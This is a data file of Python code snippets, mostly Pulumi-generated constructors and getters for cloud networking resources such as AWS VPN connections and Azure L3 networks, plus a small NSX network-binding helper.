"def _get_lsp_config_ospf_ignore_metric(self):\n return self.__lsp_config_ospf_ignore_metric",
"def __init__(__self__, *,\n customer_gateway_id: pulumi.Input[str],\n type: pulumi.Input[str],\n enable_acceleration: Optional[pulumi.Input[bool]] = None,\n local_ipv4_network_cidr: Optional[pulumi.Input[str]] = None,\n local_ipv6_network_cidr: Optional[pulumi.Input[str]] = None,\n outside_ip_address_type: Optional[pulumi.Input[str]] = None,\n remote_ipv4_network_cidr: Optional[pulumi.Input[str]] = None,\n remote_ipv6_network_cidr: Optional[pulumi.Input[str]] = None,\n static_routes_only: Optional[pulumi.Input[bool]] = None,\n tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,\n transit_gateway_id: Optional[pulumi.Input[str]] = None,\n transport_transit_gateway_attachment_id: Optional[pulumi.Input[str]] = None,\n tunnel1_dpd_timeout_action: Optional[pulumi.Input[str]] = None,\n tunnel1_dpd_timeout_seconds: Optional[pulumi.Input[int]] = None,\n tunnel1_enable_tunnel_lifecycle_control: Optional[pulumi.Input[bool]] = None,\n tunnel1_ike_versions: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tunnel1_inside_cidr: Optional[pulumi.Input[str]] = None,\n tunnel1_inside_ipv6_cidr: Optional[pulumi.Input[str]] = None,\n tunnel1_log_options: Optional[pulumi.Input['VpnConnectionTunnel1LogOptionsArgs']] = None,\n tunnel1_phase1_dh_group_numbers: Optional[pulumi.Input[Sequence[pulumi.Input[int]]]] = None,\n tunnel1_phase1_encryption_algorithms: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tunnel1_phase1_integrity_algorithms: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tunnel1_phase1_lifetime_seconds: Optional[pulumi.Input[int]] = None,\n tunnel1_phase2_dh_group_numbers: Optional[pulumi.Input[Sequence[pulumi.Input[int]]]] = None,\n tunnel1_phase2_encryption_algorithms: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tunnel1_phase2_integrity_algorithms: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tunnel1_phase2_lifetime_seconds: Optional[pulumi.Input[int]] = None,\n tunnel1_preshared_key: Optional[pulumi.Input[str]] = None,\n tunnel1_rekey_fuzz_percentage: Optional[pulumi.Input[int]] = None,\n tunnel1_rekey_margin_time_seconds: Optional[pulumi.Input[int]] = None,\n tunnel1_replay_window_size: Optional[pulumi.Input[int]] = None,\n tunnel1_startup_action: Optional[pulumi.Input[str]] = None,\n tunnel2_dpd_timeout_action: Optional[pulumi.Input[str]] = None,\n tunnel2_dpd_timeout_seconds: Optional[pulumi.Input[int]] = None,\n tunnel2_enable_tunnel_lifecycle_control: Optional[pulumi.Input[bool]] = None,\n tunnel2_ike_versions: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tunnel2_inside_cidr: Optional[pulumi.Input[str]] = None,\n tunnel2_inside_ipv6_cidr: Optional[pulumi.Input[str]] = None,\n tunnel2_log_options: Optional[pulumi.Input['VpnConnectionTunnel2LogOptionsArgs']] = None,\n tunnel2_phase1_dh_group_numbers: Optional[pulumi.Input[Sequence[pulumi.Input[int]]]] = None,\n tunnel2_phase1_encryption_algorithms: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tunnel2_phase1_integrity_algorithms: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tunnel2_phase1_lifetime_seconds: Optional[pulumi.Input[int]] = None,\n tunnel2_phase2_dh_group_numbers: Optional[pulumi.Input[Sequence[pulumi.Input[int]]]] = None,\n tunnel2_phase2_encryption_algorithms: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tunnel2_phase2_integrity_algorithms: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tunnel2_phase2_lifetime_seconds: Optional[pulumi.Input[int]] = None,\n tunnel2_preshared_key: Optional[pulumi.Input[str]] = None,\n tunnel2_rekey_fuzz_percentage: Optional[pulumi.Input[int]] = None,\n tunnel2_rekey_margin_time_seconds: Optional[pulumi.Input[int]] = None,\n tunnel2_replay_window_size: Optional[pulumi.Input[int]] = None,\n tunnel2_startup_action: Optional[pulumi.Input[str]] = None,\n tunnel_inside_ip_version: Optional[pulumi.Input[str]] = None,\n vpn_gateway_id: Optional[pulumi.Input[str]] = None):\n pulumi.set(__self__, \"customer_gateway_id\", customer_gateway_id)\n pulumi.set(__self__, \"type\", type)\n if enable_acceleration is not None:\n pulumi.set(__self__, \"enable_acceleration\", enable_acceleration)\n if local_ipv4_network_cidr is not None:\n pulumi.set(__self__, \"local_ipv4_network_cidr\", local_ipv4_network_cidr)\n if local_ipv6_network_cidr is not None:\n pulumi.set(__self__, \"local_ipv6_network_cidr\", local_ipv6_network_cidr)\n if outside_ip_address_type is not None:\n pulumi.set(__self__, \"outside_ip_address_type\", outside_ip_address_type)\n if remote_ipv4_network_cidr is not None:\n pulumi.set(__self__, \"remote_ipv4_network_cidr\", remote_ipv4_network_cidr)\n if remote_ipv6_network_cidr is not None:\n pulumi.set(__self__, \"remote_ipv6_network_cidr\", remote_ipv6_network_cidr)\n if static_routes_only is not None:\n pulumi.set(__self__, \"static_routes_only\", static_routes_only)\n if tags is not None:\n pulumi.set(__self__, \"tags\", tags)\n if transit_gateway_id is not None:\n pulumi.set(__self__, \"transit_gateway_id\", transit_gateway_id)\n if transport_transit_gateway_attachment_id is not None:\n pulumi.set(__self__, \"transport_transit_gateway_attachment_id\", transport_transit_gateway_attachment_id)\n if tunnel1_dpd_timeout_action is not None:\n pulumi.set(__self__, \"tunnel1_dpd_timeout_action\", tunnel1_dpd_timeout_action)\n if tunnel1_dpd_timeout_seconds is not None:\n pulumi.set(__self__, \"tunnel1_dpd_timeout_seconds\", tunnel1_dpd_timeout_seconds)\n if tunnel1_enable_tunnel_lifecycle_control is not None:\n pulumi.set(__self__, \"tunnel1_enable_tunnel_lifecycle_control\", tunnel1_enable_tunnel_lifecycle_control)\n if tunnel1_ike_versions is not None:\n pulumi.set(__self__, \"tunnel1_ike_versions\", tunnel1_ike_versions)\n if tunnel1_inside_cidr is not None:\n pulumi.set(__self__, \"tunnel1_inside_cidr\", tunnel1_inside_cidr)\n if tunnel1_inside_ipv6_cidr is not None:\n pulumi.set(__self__, \"tunnel1_inside_ipv6_cidr\", tunnel1_inside_ipv6_cidr)\n if tunnel1_log_options is not None:\n pulumi.set(__self__, \"tunnel1_log_options\", tunnel1_log_options)\n if tunnel1_phase1_dh_group_numbers is not None:\n pulumi.set(__self__, \"tunnel1_phase1_dh_group_numbers\", tunnel1_phase1_dh_group_numbers)\n if tunnel1_phase1_encryption_algorithms is not None:\n pulumi.set(__self__, \"tunnel1_phase1_encryption_algorithms\", tunnel1_phase1_encryption_algorithms)\n if tunnel1_phase1_integrity_algorithms is not None:\n pulumi.set(__self__, \"tunnel1_phase1_integrity_algorithms\", tunnel1_phase1_integrity_algorithms)\n if tunnel1_phase1_lifetime_seconds is not None:\n pulumi.set(__self__, \"tunnel1_phase1_lifetime_seconds\", tunnel1_phase1_lifetime_seconds)\n if tunnel1_phase2_dh_group_numbers is not None:\n pulumi.set(__self__, \"tunnel1_phase2_dh_group_numbers\", tunnel1_phase2_dh_group_numbers)\n if tunnel1_phase2_encryption_algorithms is not None:\n pulumi.set(__self__, \"tunnel1_phase2_encryption_algorithms\", tunnel1_phase2_encryption_algorithms)\n if tunnel1_phase2_integrity_algorithms is not None:\n pulumi.set(__self__, \"tunnel1_phase2_integrity_algorithms\", tunnel1_phase2_integrity_algorithms)\n if tunnel1_phase2_lifetime_seconds is not None:\n pulumi.set(__self__, \"tunnel1_phase2_lifetime_seconds\", tunnel1_phase2_lifetime_seconds)\n if tunnel1_preshared_key is not None:\n pulumi.set(__self__, \"tunnel1_preshared_key\", tunnel1_preshared_key)\n if tunnel1_rekey_fuzz_percentage is not None:\n pulumi.set(__self__, \"tunnel1_rekey_fuzz_percentage\", tunnel1_rekey_fuzz_percentage)\n if tunnel1_rekey_margin_time_seconds is not None:\n pulumi.set(__self__, \"tunnel1_rekey_margin_time_seconds\", tunnel1_rekey_margin_time_seconds)\n if tunnel1_replay_window_size is not None:\n pulumi.set(__self__, \"tunnel1_replay_window_size\", tunnel1_replay_window_size)\n if tunnel1_startup_action is not None:\n pulumi.set(__self__, \"tunnel1_startup_action\", tunnel1_startup_action)\n if tunnel2_dpd_timeout_action is not None:\n pulumi.set(__self__, \"tunnel2_dpd_timeout_action\", tunnel2_dpd_timeout_action)\n if tunnel2_dpd_timeout_seconds is not None:\n pulumi.set(__self__, \"tunnel2_dpd_timeout_seconds\", tunnel2_dpd_timeout_seconds)\n if tunnel2_enable_tunnel_lifecycle_control is not None:\n pulumi.set(__self__, \"tunnel2_enable_tunnel_lifecycle_control\", tunnel2_enable_tunnel_lifecycle_control)\n if tunnel2_ike_versions is not None:\n pulumi.set(__self__, \"tunnel2_ike_versions\", tunnel2_ike_versions)\n if tunnel2_inside_cidr is not None:\n pulumi.set(__self__, \"tunnel2_inside_cidr\", tunnel2_inside_cidr)\n if tunnel2_inside_ipv6_cidr is not None:\n pulumi.set(__self__, \"tunnel2_inside_ipv6_cidr\", tunnel2_inside_ipv6_cidr)\n if tunnel2_log_options is not None:\n pulumi.set(__self__, \"tunnel2_log_options\", tunnel2_log_options)\n if tunnel2_phase1_dh_group_numbers is not None:\n pulumi.set(__self__, \"tunnel2_phase1_dh_group_numbers\", tunnel2_phase1_dh_group_numbers)\n if tunnel2_phase1_encryption_algorithms is not None:\n pulumi.set(__self__, \"tunnel2_phase1_encryption_algorithms\", tunnel2_phase1_encryption_algorithms)\n if tunnel2_phase1_integrity_algorithms is not None:\n pulumi.set(__self__, \"tunnel2_phase1_integrity_algorithms\", tunnel2_phase1_integrity_algorithms)\n if tunnel2_phase1_lifetime_seconds is not None:\n pulumi.set(__self__, \"tunnel2_phase1_lifetime_seconds\", tunnel2_phase1_lifetime_seconds)\n if tunnel2_phase2_dh_group_numbers is not None:\n pulumi.set(__self__, \"tunnel2_phase2_dh_group_numbers\", tunnel2_phase2_dh_group_numbers)\n if tunnel2_phase2_encryption_algorithms is not None:\n pulumi.set(__self__, \"tunnel2_phase2_encryption_algorithms\", tunnel2_phase2_encryption_algorithms)\n if tunnel2_phase2_integrity_algorithms is not None:\n pulumi.set(__self__, \"tunnel2_phase2_integrity_algorithms\", tunnel2_phase2_integrity_algorithms)\n if tunnel2_phase2_lifetime_seconds is not None:\n pulumi.set(__self__, \"tunnel2_phase2_lifetime_seconds\", tunnel2_phase2_lifetime_seconds)\n if tunnel2_preshared_key is not None:\n pulumi.set(__self__, \"tunnel2_preshared_key\", tunnel2_preshared_key)\n if tunnel2_rekey_fuzz_percentage is not None:\n pulumi.set(__self__, \"tunnel2_rekey_fuzz_percentage\", tunnel2_rekey_fuzz_percentage)\n if tunnel2_rekey_margin_time_seconds is not None:\n pulumi.set(__self__, \"tunnel2_rekey_margin_time_seconds\", tunnel2_rekey_margin_time_seconds)\n if tunnel2_replay_window_size is not None:\n pulumi.set(__self__, \"tunnel2_replay_window_size\", tunnel2_replay_window_size)\n if tunnel2_startup_action is not None:\n pulumi.set(__self__, \"tunnel2_startup_action\", tunnel2_startup_action)\n if tunnel_inside_ip_version is not None:\n pulumi.set(__self__, \"tunnel_inside_ip_version\", tunnel_inside_ip_version)\n if vpn_gateway_id is not None:\n pulumi.set(__self__, \"vpn_gateway_id\", vpn_gateway_id)",
"def __init__(__self__, *,\n arn: Optional[pulumi.Input[str]] = None,\n core_network_arn: Optional[pulumi.Input[str]] = None,\n core_network_attachment_arn: Optional[pulumi.Input[str]] = None,\n customer_gateway_configuration: Optional[pulumi.Input[str]] = None,\n customer_gateway_id: Optional[pulumi.Input[str]] = None,\n enable_acceleration: Optional[pulumi.Input[bool]] = None,\n local_ipv4_network_cidr: Optional[pulumi.Input[str]] = None,\n local_ipv6_network_cidr: Optional[pulumi.Input[str]] = None,\n outside_ip_address_type: Optional[pulumi.Input[str]] = None,\n remote_ipv4_network_cidr: Optional[pulumi.Input[str]] = None,\n remote_ipv6_network_cidr: Optional[pulumi.Input[str]] = None,\n routes: Optional[pulumi.Input[Sequence[pulumi.Input['VpnConnectionRouteArgs']]]] = None,\n static_routes_only: Optional[pulumi.Input[bool]] = None,\n tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,\n tags_all: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,\n transit_gateway_attachment_id: Optional[pulumi.Input[str]] = None,\n transit_gateway_id: Optional[pulumi.Input[str]] = None,\n transport_transit_gateway_attachment_id: Optional[pulumi.Input[str]] = None,\n tunnel1_address: Optional[pulumi.Input[str]] = None,\n tunnel1_bgp_asn: Optional[pulumi.Input[str]] = None,\n tunnel1_bgp_holdtime: Optional[pulumi.Input[int]] = None,\n tunnel1_cgw_inside_address: Optional[pulumi.Input[str]] = None,\n tunnel1_dpd_timeout_action: Optional[pulumi.Input[str]] = None,\n tunnel1_dpd_timeout_seconds: Optional[pulumi.Input[int]] = None,\n tunnel1_enable_tunnel_lifecycle_control: Optional[pulumi.Input[bool]] = None,\n tunnel1_ike_versions: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tunnel1_inside_cidr: Optional[pulumi.Input[str]] = None,\n tunnel1_inside_ipv6_cidr: Optional[pulumi.Input[str]] = None,\n tunnel1_log_options: Optional[pulumi.Input['VpnConnectionTunnel1LogOptionsArgs']] = None,\n tunnel1_phase1_dh_group_numbers: Optional[pulumi.Input[Sequence[pulumi.Input[int]]]] = None,\n tunnel1_phase1_encryption_algorithms: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tunnel1_phase1_integrity_algorithms: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tunnel1_phase1_lifetime_seconds: Optional[pulumi.Input[int]] = None,\n tunnel1_phase2_dh_group_numbers: Optional[pulumi.Input[Sequence[pulumi.Input[int]]]] = None,\n tunnel1_phase2_encryption_algorithms: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tunnel1_phase2_integrity_algorithms: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tunnel1_phase2_lifetime_seconds: Optional[pulumi.Input[int]] = None,\n tunnel1_preshared_key: Optional[pulumi.Input[str]] = None,\n tunnel1_rekey_fuzz_percentage: Optional[pulumi.Input[int]] = None,\n tunnel1_rekey_margin_time_seconds: Optional[pulumi.Input[int]] = None,\n tunnel1_replay_window_size: Optional[pulumi.Input[int]] = None,\n tunnel1_startup_action: Optional[pulumi.Input[str]] = None,\n tunnel1_vgw_inside_address: Optional[pulumi.Input[str]] = None,\n tunnel2_address: Optional[pulumi.Input[str]] = None,\n tunnel2_bgp_asn: Optional[pulumi.Input[str]] = None,\n tunnel2_bgp_holdtime: Optional[pulumi.Input[int]] = None,\n tunnel2_cgw_inside_address: Optional[pulumi.Input[str]] = None,\n tunnel2_dpd_timeout_action: Optional[pulumi.Input[str]] = None,\n tunnel2_dpd_timeout_seconds: Optional[pulumi.Input[int]] = None,\n tunnel2_enable_tunnel_lifecycle_control: Optional[pulumi.Input[bool]] = None,\n tunnel2_ike_versions: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tunnel2_inside_cidr: Optional[pulumi.Input[str]] = None,\n tunnel2_inside_ipv6_cidr: Optional[pulumi.Input[str]] = None,\n tunnel2_log_options: Optional[pulumi.Input['VpnConnectionTunnel2LogOptionsArgs']] = None,\n tunnel2_phase1_dh_group_numbers: Optional[pulumi.Input[Sequence[pulumi.Input[int]]]] = None,\n tunnel2_phase1_encryption_algorithms: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tunnel2_phase1_integrity_algorithms: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tunnel2_phase1_lifetime_seconds: Optional[pulumi.Input[int]] = None,\n tunnel2_phase2_dh_group_numbers: Optional[pulumi.Input[Sequence[pulumi.Input[int]]]] = None,\n tunnel2_phase2_encryption_algorithms: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tunnel2_phase2_integrity_algorithms: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,\n tunnel2_phase2_lifetime_seconds: Optional[pulumi.Input[int]] = None,\n tunnel2_preshared_key: Optional[pulumi.Input[str]] = None,\n tunnel2_rekey_fuzz_percentage: Optional[pulumi.Input[int]] = None,\n tunnel2_rekey_margin_time_seconds: Optional[pulumi.Input[int]] = None,\n tunnel2_replay_window_size: Optional[pulumi.Input[int]] = None,\n tunnel2_startup_action: Optional[pulumi.Input[str]] = None,\n tunnel2_vgw_inside_address: Optional[pulumi.Input[str]] = None,\n tunnel_inside_ip_version: Optional[pulumi.Input[str]] = None,\n type: Optional[pulumi.Input[str]] = None,\n vgw_telemetries: Optional[pulumi.Input[Sequence[pulumi.Input['VpnConnectionVgwTelemetryArgs']]]] = None,\n vpn_gateway_id: Optional[pulumi.Input[str]] = None):\n if arn is not None:\n pulumi.set(__self__, \"arn\", arn)\n if core_network_arn is not None:\n pulumi.set(__self__, \"core_network_arn\", core_network_arn)\n if core_network_attachment_arn is not None:\n pulumi.set(__self__, \"core_network_attachment_arn\", core_network_attachment_arn)\n if customer_gateway_configuration is not None:\n pulumi.set(__self__, \"customer_gateway_configuration\", customer_gateway_configuration)\n if customer_gateway_id is not None:\n pulumi.set(__self__, \"customer_gateway_id\", customer_gateway_id)\n if enable_acceleration is not None:\n pulumi.set(__self__, \"enable_acceleration\", enable_acceleration)\n if local_ipv4_network_cidr is not None:\n pulumi.set(__self__, \"local_ipv4_network_cidr\", local_ipv4_network_cidr)\n if local_ipv6_network_cidr is not None:\n pulumi.set(__self__, \"local_ipv6_network_cidr\", local_ipv6_network_cidr)\n if outside_ip_address_type is not None:\n pulumi.set(__self__, \"outside_ip_address_type\", outside_ip_address_type)\n if remote_ipv4_network_cidr is not None:\n pulumi.set(__self__, \"remote_ipv4_network_cidr\", remote_ipv4_network_cidr)\n if remote_ipv6_network_cidr is not None:\n pulumi.set(__self__, \"remote_ipv6_network_cidr\", remote_ipv6_network_cidr)\n if routes is not None:\n pulumi.set(__self__, \"routes\", routes)\n if static_routes_only is not None:\n pulumi.set(__self__, \"static_routes_only\", static_routes_only)\n if tags is not None:\n pulumi.set(__self__, \"tags\", tags)\n if tags_all is not None:\n pulumi.set(__self__, \"tags_all\", tags_all)\n if transit_gateway_attachment_id is not None:\n pulumi.set(__self__, \"transit_gateway_attachment_id\", transit_gateway_attachment_id)\n if transit_gateway_id is not None:\n pulumi.set(__self__, \"transit_gateway_id\", transit_gateway_id)\n if transport_transit_gateway_attachment_id is not None:\n pulumi.set(__self__, \"transport_transit_gateway_attachment_id\", transport_transit_gateway_attachment_id)\n if tunnel1_address is not None:\n pulumi.set(__self__, \"tunnel1_address\", tunnel1_address)\n if tunnel1_bgp_asn is not None:\n pulumi.set(__self__, \"tunnel1_bgp_asn\", tunnel1_bgp_asn)\n if tunnel1_bgp_holdtime is not None:\n pulumi.set(__self__, \"tunnel1_bgp_holdtime\", tunnel1_bgp_holdtime)\n if tunnel1_cgw_inside_address is not None:\n pulumi.set(__self__, \"tunnel1_cgw_inside_address\", tunnel1_cgw_inside_address)\n if tunnel1_dpd_timeout_action is not None:\n pulumi.set(__self__, \"tunnel1_dpd_timeout_action\", tunnel1_dpd_timeout_action)\n if tunnel1_dpd_timeout_seconds is not None:\n pulumi.set(__self__, \"tunnel1_dpd_timeout_seconds\", tunnel1_dpd_timeout_seconds)\n if tunnel1_enable_tunnel_lifecycle_control is not None:\n pulumi.set(__self__, \"tunnel1_enable_tunnel_lifecycle_control\", tunnel1_enable_tunnel_lifecycle_control)\n if tunnel1_ike_versions is not None:\n pulumi.set(__self__, \"tunnel1_ike_versions\", tunnel1_ike_versions)\n if tunnel1_inside_cidr is not None:\n pulumi.set(__self__, \"tunnel1_inside_cidr\", tunnel1_inside_cidr)\n if tunnel1_inside_ipv6_cidr is not None:\n pulumi.set(__self__, \"tunnel1_inside_ipv6_cidr\", tunnel1_inside_ipv6_cidr)\n if tunnel1_log_options is not None:\n pulumi.set(__self__, \"tunnel1_log_options\", tunnel1_log_options)\n if tunnel1_phase1_dh_group_numbers is not None:\n pulumi.set(__self__, \"tunnel1_phase1_dh_group_numbers\", tunnel1_phase1_dh_group_numbers)\n if tunnel1_phase1_encryption_algorithms is not None:\n pulumi.set(__self__, \"tunnel1_phase1_encryption_algorithms\", tunnel1_phase1_encryption_algorithms)\n if tunnel1_phase1_integrity_algorithms is not None:\n pulumi.set(__self__, \"tunnel1_phase1_integrity_algorithms\", tunnel1_phase1_integrity_algorithms)\n if tunnel1_phase1_lifetime_seconds is not None:\n pulumi.set(__self__, \"tunnel1_phase1_lifetime_seconds\", tunnel1_phase1_lifetime_seconds)\n if tunnel1_phase2_dh_group_numbers is not None:\n pulumi.set(__self__, \"tunnel1_phase2_dh_group_numbers\", tunnel1_phase2_dh_group_numbers)\n if tunnel1_phase2_encryption_algorithms is not None:\n pulumi.set(__self__, \"tunnel1_phase2_encryption_algorithms\", tunnel1_phase2_encryption_algorithms)\n if tunnel1_phase2_integrity_algorithms is not None:\n pulumi.set(__self__, \"tunnel1_phase2_integrity_algorithms\", tunnel1_phase2_integrity_algorithms)\n if tunnel1_phase2_lifetime_seconds is not None:\n pulumi.set(__self__, \"tunnel1_phase2_lifetime_seconds\", tunnel1_phase2_lifetime_seconds)\n if tunnel1_preshared_key is not None:\n pulumi.set(__self__, \"tunnel1_preshared_key\", tunnel1_preshared_key)\n if tunnel1_rekey_fuzz_percentage is not None:\n pulumi.set(__self__, \"tunnel1_rekey_fuzz_percentage\", tunnel1_rekey_fuzz_percentage)\n if tunnel1_rekey_margin_time_seconds is not None:\n pulumi.set(__self__, \"tunnel1_rekey_margin_time_seconds\", tunnel1_rekey_margin_time_seconds)\n if tunnel1_replay_window_size is not None:\n pulumi.set(__self__, \"tunnel1_replay_window_size\", tunnel1_replay_window_size)\n if tunnel1_startup_action is not None:\n pulumi.set(__self__, \"tunnel1_startup_action\", tunnel1_startup_action)\n if tunnel1_vgw_inside_address is not None:\n pulumi.set(__self__, \"tunnel1_vgw_inside_address\", tunnel1_vgw_inside_address)\n if tunnel2_address is not None:\n pulumi.set(__self__, \"tunnel2_address\", tunnel2_address)\n if tunnel2_bgp_asn is not None:\n pulumi.set(__self__, \"tunnel2_bgp_asn\", tunnel2_bgp_asn)\n if tunnel2_bgp_holdtime is not None:\n pulumi.set(__self__, \"tunnel2_bgp_holdtime\", tunnel2_bgp_holdtime)\n if tunnel2_cgw_inside_address is not None:\n pulumi.set(__self__, \"tunnel2_cgw_inside_address\", tunnel2_cgw_inside_address)\n if tunnel2_dpd_timeout_action is not None:\n pulumi.set(__self__, \"tunnel2_dpd_timeout_action\", tunnel2_dpd_timeout_action)\n if tunnel2_dpd_timeout_seconds is not None:\n pulumi.set(__self__, \"tunnel2_dpd_timeout_seconds\", tunnel2_dpd_timeout_seconds)\n if tunnel2_enable_tunnel_lifecycle_control is not None:\n pulumi.set(__self__, \"tunnel2_enable_tunnel_lifecycle_control\", tunnel2_enable_tunnel_lifecycle_control)\n if tunnel2_ike_versions is not None:\n pulumi.set(__self__, \"tunnel2_ike_versions\", tunnel2_ike_versions)\n if tunnel2_inside_cidr is not None:\n pulumi.set(__self__, \"tunnel2_inside_cidr\", tunnel2_inside_cidr)\n if tunnel2_inside_ipv6_cidr is not None:\n pulumi.set(__self__, \"tunnel2_inside_ipv6_cidr\", tunnel2_inside_ipv6_cidr)\n if tunnel2_log_options is not None:\n pulumi.set(__self__, \"tunnel2_log_options\", tunnel2_log_options)\n if tunnel2_phase1_dh_group_numbers is not None:\n pulumi.set(__self__, \"tunnel2_phase1_dh_group_numbers\", tunnel2_phase1_dh_group_numbers)\n if tunnel2_phase1_encryption_algorithms is not None:\n pulumi.set(__self__, \"tunnel2_phase1_encryption_algorithms\", tunnel2_phase1_encryption_algorithms)\n if tunnel2_phase1_integrity_algorithms is not None:\n pulumi.set(__self__, \"tunnel2_phase1_integrity_algorithms\", tunnel2_phase1_integrity_algorithms)\n if tunnel2_phase1_lifetime_seconds is not None:\n pulumi.set(__self__, \"tunnel2_phase1_lifetime_seconds\", tunnel2_phase1_lifetime_seconds)\n if tunnel2_phase2_dh_group_numbers is not None:\n pulumi.set(__self__, \"tunnel2_phase2_dh_group_numbers\", tunnel2_phase2_dh_group_numbers)\n if tunnel2_phase2_encryption_algorithms is not None:\n pulumi.set(__self__, \"tunnel2_phase2_encryption_algorithms\", tunnel2_phase2_encryption_algorithms)\n if tunnel2_phase2_integrity_algorithms is not None:\n pulumi.set(__self__, \"tunnel2_phase2_integrity_algorithms\", tunnel2_phase2_integrity_algorithms)\n if tunnel2_phase2_lifetime_seconds is not None:\n pulumi.set(__self__, \"tunnel2_phase2_lifetime_seconds\", tunnel2_phase2_lifetime_seconds)\n if tunnel2_preshared_key is not None:\n pulumi.set(__self__, \"tunnel2_preshared_key\", tunnel2_preshared_key)\n if tunnel2_rekey_fuzz_percentage is not None:\n pulumi.set(__self__, \"tunnel2_rekey_fuzz_percentage\", tunnel2_rekey_fuzz_percentage)\n if tunnel2_rekey_margin_time_seconds is not None:\n pulumi.set(__self__, \"tunnel2_rekey_margin_time_seconds\", tunnel2_rekey_margin_time_seconds)\n if tunnel2_replay_window_size is not None:\n pulumi.set(__self__, \"tunnel2_replay_window_size\", tunnel2_replay_window_size)\n if tunnel2_startup_action is not None:\n pulumi.set(__self__, \"tunnel2_startup_action\", tunnel2_startup_action)\n if tunnel2_vgw_inside_address is not None:\n pulumi.set(__self__, \"tunnel2_vgw_inside_address\", tunnel2_vgw_inside_address)\n if tunnel_inside_ip_version is not None:\n pulumi.set(__self__, \"tunnel_inside_ip_version\", tunnel_inside_ip_version)\n if type is not None:\n pulumi.set(__self__, \"type\", type)\n if vgw_telemetries is not None:\n pulumi.set(__self__, \"vgw_telemetries\", vgw_telemetries)\n if vpn_gateway_id is not None:\n pulumi.set(__self__, \"vpn_gateway_id\", vpn_gateway_id)",
"def network(self):\n return self.__network",
"def ip_protocol(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"ip_protocol\")",
"def __init__(__self__, *,\n extended_location: pulumi.Input['ExtendedLocationArgs'],\n l3_isolation_domain_id: pulumi.Input[str],\n resource_group_name: pulumi.Input[str],\n vlan: pulumi.Input[float],\n hybrid_aks_ipam_enabled: Optional[pulumi.Input[Union[str, 'HybridAksIpamEnabled']]] = None,\n hybrid_aks_plugin_type: Optional[pulumi.Input[Union[str, 'HybridAksPluginType']]] = None,\n interface_name: Optional[pulumi.Input[str]] = None,\n ip_allocation_type: Optional[pulumi.Input[Union[str, 'IpAllocationType']]] = None,\n ipv4_connected_prefix: Optional[pulumi.Input[str]] = None,\n ipv6_connected_prefix: Optional[pulumi.Input[str]] = None,\n l3_network_name: Optional[pulumi.Input[str]] = None,\n location: Optional[pulumi.Input[str]] = None,\n tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None):\n pulumi.set(__self__, \"extended_location\", extended_location)\n pulumi.set(__self__, \"l3_isolation_domain_id\", l3_isolation_domain_id)\n pulumi.set(__self__, \"resource_group_name\", resource_group_name)\n pulumi.set(__self__, \"vlan\", vlan)\n if hybrid_aks_ipam_enabled is None:\n hybrid_aks_ipam_enabled = 'True'\n if hybrid_aks_ipam_enabled is not None:\n pulumi.set(__self__, \"hybrid_aks_ipam_enabled\", hybrid_aks_ipam_enabled)\n if hybrid_aks_plugin_type is None:\n hybrid_aks_plugin_type = 'SRIOV'\n if hybrid_aks_plugin_type is not None:\n pulumi.set(__self__, \"hybrid_aks_plugin_type\", hybrid_aks_plugin_type)\n if interface_name is not None:\n pulumi.set(__self__, \"interface_name\", interface_name)\n if ip_allocation_type is None:\n ip_allocation_type = 'DualStack'\n if ip_allocation_type is not None:\n pulumi.set(__self__, \"ip_allocation_type\", ip_allocation_type)\n if ipv4_connected_prefix is not None:\n pulumi.set(__self__, \"ipv4_connected_prefix\", ipv4_connected_prefix)\n if ipv6_connected_prefix is not None:\n pulumi.set(__self__, \"ipv6_connected_prefix\", ipv6_connected_prefix)\n if l3_network_name is not None:\n pulumi.set(__self__, \"l3_network_name\", l3_network_name)\n if location is not None:\n pulumi.set(__self__, \"location\", location)\n if tags is not None:\n pulumi.set(__self__, \"tags\", tags)",
"def host_network(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"host_network\")",
"def host_network(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"host_network\")",
"def network_config(self) -> pulumi.Output['outputs.PrivateCloudNetworkConfig']:\n return pulumi.get(self, \"network_config\")",
"def __init__(__self__, *,\n endpoint_type: pulumi.Input[str],\n resource_id: Optional[pulumi.Input[str]] = None):\n pulumi.set(__self__, \"endpoint_type\", 'HybridConnection')\n if resource_id is not None:\n pulumi.set(__self__, \"resource_id\", resource_id)",
"def _extend_network_dict_provider(self, context, network, bindings=None):\n if 'id' not in network:\n return\n if not bindings:\n bindings = nsx_db.get_network_bindings(context.session,\n network['id'])\n\n # With NSX plugin, \"normal\" overlay networks will have no binding\n if bindings:\n # Network came in through provider networks API\n network[pnet.NETWORK_TYPE] = bindings[0].binding_type\n network[pnet.PHYSICAL_NETWORK] = bindings[0].phy_uuid\n network[pnet.SEGMENTATION_ID] = bindings[0].vlan_id",
